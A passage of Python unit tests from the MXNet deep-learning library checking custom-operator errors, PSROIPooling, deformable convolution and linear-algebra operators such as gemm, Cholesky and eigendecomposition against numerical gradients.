b = mx.nd.zeros((1, 4))
# trigger error by invalid input shapes of operands
c = mx.nd.Custom(a, b, op_type='Dot2')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc2)
# 3. error in real execution
if default_context().device_type == 'cpu':
def custom_exc3():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
out_data[0].wait_to_read()
_build_dot_custom(f, 'Dot3')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot3')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc3)
def custom_exc4():
def f(in_data, out_data):
dot = mx.nd.dot(in_data[0], in_data[1])
# input to Cholesky factorization should be
# symmetric positive-definite, error will be
# triggered in op execution on cpu
out_data[0][:] = mx.nd.linalg.potrf(dot)
_build_dot_custom(f, 'Dot4')
a = mx.nd.zeros((2, 1))
b = mx.nd.zeros((1, 2))
c = mx.nd.Custom(a, b, op_type='Dot4')
c.wait_to_read()
pytest.raises(MXNetError, custom_exc4)
@with_seed()
def test_psroipooling():
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([168, 224], [168, 224]):
for grad_nodes in [['im_data']]:
spatial_scale = 0.0625
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1))
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1))
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
op = mx.sym.contrib.PSROIPooling(data=im_data_var, rois=rois_data_var, spatial_scale=spatial_scale,
group_size=num_group, pooled_size=num_group,
output_dim=num_classes, name='test_op')
rtol, atol = 1e-2, 1e-3
check_numeric_gradient(op, [im_data, rois_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes)
@with_seed()
def test_psroipooling_with_type():
arg_params = {
'psroipool_rois': np.array([[0, 10, 22, 161, 173], [0, 20, 15, 154, 160]])}
# plain psroipooling
sym = mx.sym.contrib.PSROIPooling(spatial_scale=0.0625, output_dim=2, pooled_size=3, name='psroipool')
ctx_list = [{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float64, 'psroipool_rois': np.float64}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float32, 'psroipool_rois': np.float32}},
{'ctx': mx.cpu(0),
'psroipool_data': (1, 18, 14, 14),
'psroipool_rois': (2, 5),
'type_dict': {'psroipool_data': np.float16, 'psroipool_rois': np.float16}},
]
check_consistency(sym, ctx_list, grad_req={'psroipool_data': 'write',
'psroipool_rois': 'null'}, arg_params=arg_params)
@with_seed()
def test_deformable_convolution():
for num_batch in [1, 2]:
for num_channel_data, num_deformable_group in itertools.product([4, 8], [1, 2]):
for input_height, input_width in itertools.product([5, 6], [5, 6]):
for dilate in [(1, 1), (2, 2)]:
for grad_nodes in [['im_data'], ['offset_data'], ['weight']]:
output_height = input_height
output_width = input_width
im_data = np.random.rand(num_batch, num_channel_data, input_height, input_width)
offset_data = \
np.random.rand(num_batch, num_deformable_group * 3 * 3 * 2, output_height, output_width)\
* 0.8 + 0.1
weight = np.random.normal(0, 0.001, (num_channel_data, num_channel_data, 3, 3))
bias = np.zeros(num_channel_data)
im_data_var = mx.symbol.Variable(name="im_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
weight_var = mx.symbol.Variable(name="weight")
bias_var = mx.symbol.Variable(name="bias")
op = mx.sym.contrib.DeformableConvolution(name='test_op', data=im_data_var,
offset=offset_data_var,
weight=weight_var, bias=bias_var,
num_filter=num_channel_data, pad=dilate,
kernel=(3, 3), stride=(1, 1), dilate=dilate,
num_deformable_group=num_deformable_group)
if grad_nodes[0] == 'offset_data':
# wider tolerance needed for coordinate differential
rtol, atol = 1.0, 1e-2
else:
rtol, atol = 0.05, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, offset_data, weight, bias], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _validate_sample_location(input_rois, input_offset, spatial_scale, pooled_w, pooled_h, sample_per_part, part_size, output_dim, num_classes, trans_std, feat_h, feat_w):
num_rois = input_rois.shape[0]
output_offset = input_offset.copy()
# simulate deformable psroipooling forward function
for roi_idx in range(num_rois):
sub_rois = input_rois[roi_idx, :].astype(np.float32)
img_idx, x0, y0, x1, y1 = int(sub_rois[0]), sub_rois[1], sub_rois[2], sub_rois[3], sub_rois[4]
roi_start_w = round(x0) * spatial_scale - 0.5
roi_start_h = round(y0) * spatial_scale - 0.5
roi_end_w = round(x1 + 1) * spatial_scale - 0.5
roi_end_h = round(y1 + 1) * spatial_scale - 0.5
roi_w, roi_h = roi_end_w - roi_start_w, roi_end_h - roi_start_h
bin_size_w, bin_size_h = roi_w / pooled_w, roi_h / pooled_h
sub_bin_size_w, sub_bin_size_h = bin_size_w / sample_per_part, bin_size_h / sample_per_part
for c_top in range(output_dim):
channel_each_cls = output_dim / num_classes
class_id = int(c_top / channel_each_cls)
for ph in range(pooled_h):
for pw in range(pooled_w):
part_h = int(math.floor(float(ph) / pooled_h * part_size))
part_w = int(math.floor(float(pw) / pooled_w * part_size))
trans_x = input_offset[roi_idx, class_id * 2, part_h, part_w] * trans_std
trans_y = input_offset[roi_idx, class_id * 2 + 1, part_h, part_w] * trans_std
bin_h_start, bin_w_start = ph * bin_size_h + roi_start_h, pw * bin_size_w + roi_start_w
need_check = True
while need_check:
pass_check = True
for ih in range(sample_per_part):
for iw in range(sample_per_part):
h = bin_h_start + trans_y * roi_h + ih * sub_bin_size_h
w = bin_w_start + trans_x * roi_w + iw * sub_bin_size_w
if w < -0.5 or w > feat_w - 0.5 or h < -0.5 or h > feat_h - 0.5:
continue
w = min(max(w, 0.1), feat_w - 1.1)
h = min(max(h, 0.1), feat_h - 1.1)
# if the following condiiton holds, the sampling location is not differentiable
# therefore we need to re-do the sampling process
if h - math.floor(h) < 1e-3 or math.ceil(h) - h < 1e-3 or w - math.floor(w) < 1e-3 or math.ceil(w) - w < 1e-3:
trans_x, trans_y = random.random() * trans_std, random.random() * trans_std
pass_check = False
break
if not pass_check:
break
if pass_check:
output_offset[roi_idx, class_id * 2 + 1, part_h, part_w] = trans_y / trans_std
output_offset[roi_idx, class_id * 2, part_h, part_w] = trans_x / trans_std
need_check = False
return output_offset
@unittest.skip("Flaky test, tracked at https://github.com/apache/incubator-mxnet/issues/11713")
@with_seed()
def test_deformable_psroipooling():
sample_per_part = 4
trans_std = 0.1
for num_rois in [1, 2]:
for num_classes, num_group in itertools.product([2, 3], [2, 3]):
for image_height, image_width in itertools.product([160, 224], [160, 224]):
for grad_nodes in [['im_data'], ['offset_data']]:
spatial_scale = 0.0625
stride = int(1 / spatial_scale)
feat_height = np.int(image_height * spatial_scale)
feat_width = np.int(image_width * spatial_scale)
im_data = np.random.rand(1, num_classes*num_group*num_group, feat_height, feat_width)
rois_data = np.zeros([num_rois, 5])
rois_data[:, [1,3]] = np.sort(np.random.rand(num_rois, 2)*(image_width-1 - 2 * stride)) + stride
rois_data[:, [2,4]] = np.sort(np.random.rand(num_rois, 2)*(image_height-1 - 2 * stride)) + stride
offset_data = np.random.rand(num_rois, 2*num_classes, num_group, num_group)
# at certain points, the bilinear interpolation function may be non-differentiable
# to avoid this, we check whether the input locates on the valid points
offset_data = _validate_sample_location(rois_data, offset_data, spatial_scale, num_group, num_group,
sample_per_part, num_group, num_classes, num_classes, trans_std, feat_height, feat_width)
im_data_var = mx.symbol.Variable(name="im_data")
rois_data_var = mx.symbol.Variable(name="rois_data")
offset_data_var = mx.symbol.Variable(name="offset_data")
op = mx.sym.contrib.DeformablePSROIPooling(data=im_data_var, rois=rois_data_var,
trans=offset_data_var, spatial_scale=spatial_scale,
sample_per_part=4, group_size=num_group,
pooled_size=num_group, output_dim=num_classes,
trans_std=0.1, no_trans=False, name='test_op')
rtol, atol = 1e-2, 1e-3
# By now we only have gpu implementation
if default_context().device_type == 'gpu':
check_numeric_gradient(op, [im_data, rois_data, offset_data], rtol=rtol, atol=atol,
grad_nodes=grad_nodes, ctx=mx.gpu(0))
def _gemm_test_helper(dtype, grad_check, rtol_fw = 1e-7, atol_fw = 1e-9):
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
data3 = mx.symbol.Variable('data3')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
shape1 = (2, 3)
shape2 = (3, 2)
shape3 = (3, 3)
shape4 = (2, 2)
data_in1 = np.random.uniform(1, 10, shape1).astype(dtype)
data_in2 = np.random.uniform(1, 10, shape2).astype(dtype)
data_in3 = np.random.uniform(1, 10, shape3).astype(dtype)
data_in4 = np.random.uniform(1, 10, shape4).astype(dtype)
# Check all transpositions of gemm operator.
data_in1_t = np.transpose(data_in1)
data_in2_t = np.transpose(data_in2)
res_gemm = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [data_in1, data_in2, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in4])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True, transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2, data_in3])
res_gemm = 4. * np.dot(data_in1_t, data_in1) + 7. * data_in3
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1, data_in3], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in3])
res_gemm = 4. * np.dot(data_in1, data_in1_t) + 7. * data_in4
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1, data_in4], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1, data_in4])
# Check batch of gemm.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
c = rep_3x(data_in4, 2, 2)
r = 4. * np.dot(data_in1, data_in2) + 7. * data_in4
r = rep_3x(r, 2, 2)
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7.)
check_fw(test_gemm, [a, b, c], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b, c])
# Check for different axis that describes matrix rows.
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
c2 = np.copy(np.swapaxes(c, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = 0)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
c2 = np.copy(np.swapaxes(c, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm(data1, data2, data3, alpha=4., beta=7., axis = -3)
check_fw(test_gemm, [a2, b2, c2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2, c2])
# Check gemm2 operator same way as gemm.
res_gemm = 4. * np.dot(data_in1, data_in2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in2_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True,
transpose_b=True)
check_fw(test_gemm, [data_in1, data_in2], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in2])
res_gemm = 4. * np.dot(data_in1_t, data_in1)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_a=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
res_gemm = 4. * np.dot(data_in1, data_in1_t)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., transpose_b=True)
check_fw(test_gemm, [data_in1, data_in1], [res_gemm])
if grad_check == 1:
check_grad(test_gemm, [data_in1, data_in1])
# Check batch of gemm2.
a = rep_3x(data_in1, 2, 3)
b = rep_3x(data_in2, 3, 2)
r = rep_3x(4. * np.dot(data_in1, data_in2), 2, 2)
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4.)
check_fw(test_gemm, [a, b], [r])
if grad_check == 1:
check_grad(test_gemm, [a, b])
a2 = np.copy(np.swapaxes(a, 0, 2))
b2 = np.copy(np.swapaxes(b, 0, 2))
r2 = np.copy(np.swapaxes(r, 0, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = 0)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
a2 = np.copy(np.swapaxes(a, 1, 2))
b2 = np.copy(np.swapaxes(b, 1, 2))
r2 = np.copy(np.swapaxes(r, 1, 2))
test_gemm = mx.sym.linalg.gemm2(data1, data2, alpha=4., axis = -3)
check_fw(test_gemm, [a2, b2], [r2])
if grad_check == 1:
check_grad(test_gemm, [a2, b2])
# Test gemm separately from other la-operators.
@with_seed()
def test_gemm():
_gemm_test_helper(np.float64, True)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
_gemm_test_helper(np.float32, False, rtol_fw = 1e-5, atol_fw = 1e-7)
if default_context().device_type == 'gpu':
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "1"
_gemm_test_helper(np.float32, False, rtol_fw = 2e-5, atol_fw = 2e-7)
os.environ["MXNET_CUDA_TENSOR_OP_MATH_ALLOW_CONVERSION"] = "0"
# Helper functions for test_laop
def _make_symm_symbol(a, ndims):
assert ndims >= 2
tr_shape = list(range(ndims))
tr_shape[-1] = ndims-2
tr_shape[-2] = ndims-1
tr_shape = tuple(tr_shape)
return 0.5 * (a + mx.sym.transpose(a, axes=tr_shape))
def _make_triangle_symm(a, ndims, m, lower, dtype=np.float32):
assert ndims >= 2
# The last two dimensions must both be m
# Create mask for lower triangle and diagonal
index = mx.sym.arange(start=0, stop=m, step=1, dtype=np.int32)
lt_mask = mx.sym.one_hot(index, depth=m, dtype=dtype)
for j in range(1, m):
part1 = mx.sym.zeros(shape=(j, m), dtype=dtype)
index = mx.sym.arange(start=0, stop=m-j, step=1, dtype=np.int32)
part2 = mx.sym.one_hot(index, depth=m, dtype=dtype)
lt_mask = lt_mask + mx.sym.concat(*[part1, part2], dim=0)
if not lower:
lt_mask = mx.sym.reshape(lt_mask, shape=(m, m))
lt_mask = mx.sym.transpose(lt_mask, axes=(1, 0))
shp = tuple([1]*(ndims-2) + [m, m])
lt_mask = mx.sym.reshape(lt_mask, shape=shp)
return mx.sym.broadcast_mul(a, lt_mask)
# @ankkhedia: Getting rid of fixed seed as flakiness could not be reproduced
# tracked at https://github.com/apache/incubator-mxnet/issues/11718
@xfail_when_nonstandard_decimal_separator
@with_seed()
def test_laop():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 2e-6
rtol_bw = 1e-5
atol_bw = 1e-5
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
data2 = mx.symbol.Variable('data2')
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
def check_fw_grad(sym, location, expected):
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
if grad_check == 1:
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
matrix = np.array([[9., 3., -6., 12.],
[3., 26., -7., -11.],
[-6., -7., 9., 7.],
[12., -11., 7., 65.]])
trian = np.array([[3., 0., 0., 0.],
[1., 5., 0., 0.],
[-2., -1., 2., 0.],
[4., -3., 6., 2.]])
pow = np.array([[2., 1., 1., 1.],
[1., 4., 1., 1.],
[1., 1., 8., 1.],
[1., 1., 1., 16.]])
inv = np.array([[8.95/3., 0.05/3., 2.65, -2.5/3.],
[0.05/3., 0.05, 0.05, 0.],
[2.65, 0.05, 2.5, -0.75],
[-2.5/3., 0., -0.75, 0.25]])
ident = np.eye(4)
shape = (4, 4, 1, 1)
ones = mx.nd.ones(shape).asnumpy()
for lower in [True, False]:
upper = not lower
# Tests with trivial 1x1 matrices.
data_in = np.random.uniform(1, 10, shape)
# test potrf
# Note: Have to symmetrize input, for gradient test to work
res_potrf = np.sqrt(data_in)
test_potrf = mx.sym.linalg.potrf(data1, lower=lower)
check_fw_grad(test_potrf, [data_in], [res_potrf])
# test potri
res_potri = np.divide(ones, data_in * data_in)
test_potri = mx.sym.linalg.potri(data1, lower=lower)
check_fw_grad(test_potri, [data_in], [res_potri])
# test trsm
trian_in = data_in * 7.
test_trsm = mx.sym.linalg.trsm(data1, data2, alpha=7., lower=lower)
check_fw_grad(test_trsm, [trian_in, data_in], [ones])
# test trmm
trian_in = np.divide(ones, trian_in)
test_trmm = mx.sym.linalg.trmm(data1, data2, alpha=7., transpose=True,
rightside=True, lower=lower)
check_fw_grad(test_trmm, [trian_in, data_in], [ones])
# test sumlogdiag
res_sumlogdiag = np.reshape(np.log(data_in), (4, 4))
test_sumlogdiag = mx.sym.linalg.sumlogdiag(data1)
check_fw_grad(test_sumlogdiag, [data_in], [res_sumlogdiag])
# more elaborate example of Cholesky factorization
low_trian = trian
if upper:
trian = np.transpose(trian)
# test potrf
test_potrf = mx.sym.linalg.potrf(_make_symm_symbol(data1, ndims=4), lower=lower)
a = rep_3x(matrix, 4, 4)
r = rep_3x(trian, 4, 4)
check_fw_grad(test_potrf, [a], [r])
#test potri
data1_ltri = _make_triangle_symm(
data1, ndims=4, m=4, lower=lower, dtype=dtype)
test_potri = mx.sym.linalg.potri(data1_ltri, lower=lower)
a = rep_3x(trian, 4, 4)
r = rep_3x(inv, 4, 4)
check_fw_grad(test_potri, [a], [r])
# test trsm
test_trsm = mx.sym.linalg.trsm(data1_ltri, data2, alpha=7., transpose=upper, lower=lower)
b = rep_3x(matrix, 4, 4)
r = rep_3x(7. * np.transpose(low_trian), 4, 4)
check_fw_grad(test_trsm, [a, b], [r])
test_trsm2 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-2., rightside=True, transpose=lower, lower=lower)
r = rep_3x(-2. * low_trian, 4, 4)
check_fw_grad(test_trsm2, [a, b], [r])
test_trsm3 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=0.5, transpose=lower, lower=lower)
b = rep_3x(np.transpose(low_trian), 4, 4)
r = rep_3x(0.5 * ident, 4, 4)
check_fw_grad(test_trsm3, [a, b], [r])
test_trsm4 = mx.sym.linalg.trsm(
data1_ltri, data2, alpha=-0.5, rightside=True, transpose=upper, lower=lower)
b = rep_3x(low_trian, 4, 4)
r = rep_3x(-0.5 * ident, 4, 4)
check_fw_grad(test_trsm4, [a, b], [r])
# test trmm
test_trmm = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=7., transpose=True, rightside=True, lower=lower)
a = [a, rep_3x(matrix, 4, 4)]
r = rep_3x(7. * np.dot(matrix, trian.T), 4, 4)
check_fw_grad(test_trmm, a, [r])
test_trmm2 = mx.sym.linalg.trmm(data1_ltri, data2, alpha=-2., lower=lower)
r = rep_3x(-2. * np.dot(trian, matrix), 4, 4)
check_fw_grad(test_trmm2, a, [r])
test_trmm3 = mx.sym.linalg.trmm(data1_ltri, data2, rightside=True, lower=lower)
r = rep_3x(np.dot(matrix, trian), 4, 4)
check_fw_grad(test_trmm3, a, [r])
test_trmm4 = mx.sym.linalg.trmm(
data1_ltri, data2, alpha=1.2, transpose=True, lower=lower)
r = rep_3x(1.2 * np.dot(trian.T, matrix), 4, 4)
check_fw_grad(test_trmm4, a, [r])
# test sumlogdiag
r = np.reshape(np.tile(10. * np.log(np.array([2.])), 3), (3,))
check_fw_grad(test_sumlogdiag, [rep_3x(pow, 4, 4)], [r])
# Tests for operators linalg.syrk, linalg.gelqf
def _gelqf_combined_symbol(a):
q, l = mx.sym.linalg.gelqf(a)
q_qt = mx.sym.linalg.syrk(q, transpose=False, alpha=1., name='Q_times_Qt')
l_q = mx.sym.linalg.trmm(l, q, alpha=1., name='L_times_Q')
return mx.sym.Group([q_qt, l_q])
# NOTE: If we leave the unused output dangling, things break if dtype=np.float64. Namely, the
# backward gradient for the unused output is of dtype np.float32 then.
# ==> Very annoying!
def _gelqf_first_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(l), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(q, bogus_scal)
def _gelqf_second_output(a):
q, l = mx.sym.linalg.gelqf(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(q), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(l, bogus_scal)
def _syevd_combined_symbol(a):
u, lam = mx.sym.linalg.syevd(a)
u_ut = mx.sym.linalg.syrk(u, transpose=False, alpha=1., name='U_times_Ut')
lam_u = mx.sym.broadcast_mul(mx.sym.reshape(lam, shape=(-2, 1)), u)
ut_lam_u = mx.sym.linalg.gemm2(u, lam_u, alpha=1., transpose_a=True,
transpose_b=False, name='Ut_L_U')
return mx.sym.Group([u_ut, ut_lam_u])
@with_seed()
def test_laop_2():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-5
atol_bw = 1e-6
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
# Tests for linalg.syrk
mnalpha_lst = [(2, 3, 1.), (5, 3, -2.), (1, 6, 5.), (3, 3, 0.5), (4, 1, 10.), (1, 1, 1.)]
for m, n, alpha in mnalpha_lst:
#print('syrk: m={}, n={}, alpha={}'.format(m, n, alpha))
data_in1 = np.random.uniform(1, 10, (m, n))
res_syrk1 = alpha * np.dot(data_in1, data_in1.T)
test_syrk1 = mx.sym.linalg.syrk(data1, transpose=False, alpha=alpha)
check_fw(test_syrk1, [data_in1], [res_syrk1])
if grad_check == 1:
check_grad(test_syrk1, [data_in1])
res_syrk2 = alpha * np.dot(data_in1.T, data_in1)
test_syrk2 = mx.sym.linalg.syrk(data1, transpose=True, alpha=alpha)
check_fw(test_syrk2, [data_in1], [res_syrk2])
if grad_check == 1:
check_grad(test_syrk2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
r1_batch = rep_3x(res_syrk1, m, m)
check_fw(test_syrk1, [a_batch], [r1_batch])
if grad_check == 1:
check_grad(test_syrk1, [a_batch])
r2_batch = rep_3x(res_syrk2, n, n)
check_fw(test_syrk2, [a_batch], [r2_batch])
if grad_check == 1:
check_grad(test_syrk2, [a_batch])
# Tests for linalg.gelqf
# Currently disabled on GPU as they need cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
test_gelqf2 = _gelqf_combined_symbol(data1) # Outputs (dot(Q, Q.T), dot(L, Q))
test_gelqf_q = _gelqf_first_output(data1) # Output Q (L is not dangling)
test_gelqf_l = _gelqf_second_output(data1) # Output L (Q is not dangling)
mn_lst = [(4, 4), (1, 1), (5, 20), (1, 10), (15, 50)]
for m, n in mn_lst:
#print('gelqf: m={}, n={}'.format(m, n))
data_in1 = np.random.normal(0., 10., (m, n))
res_eye = np.eye(m)
res_a = data_in1
check_fw(test_gelqf2, [data_in1], [res_eye, res_a])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [data_in1])
# A => L
check_grad(test_gelqf_l, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, m, n)
reye_batch = rep_3x(res_eye, m, m)
ra_batch = a_batch
check_fw(test_gelqf2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => Q
check_grad(test_gelqf_q, [a_batch])
# A => L
check_grad(test_gelqf_l, [a_batch])
# Tests for operator linalg.syevd
def _syevd_first_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(lam), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(u, bogus_scal)
def _syevd_second_output(a):
u, lam = mx.sym.linalg.syevd(a)
bogus_scal = mx.sym.sum(mx.sym.BlockGrad(u), axis=(), keepdims=True) * 0.0
return mx.sym.broadcast_add(lam, bogus_scal)
def _syevd_forward(a):
lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@with_seed(1896893923)
def test_laop_3():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
@with_seed()
def test_laop_4():
# Currently disabled on GPU as syevd needs cuda8
# and MxNet builds use cuda 7.5
if not (default_context() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
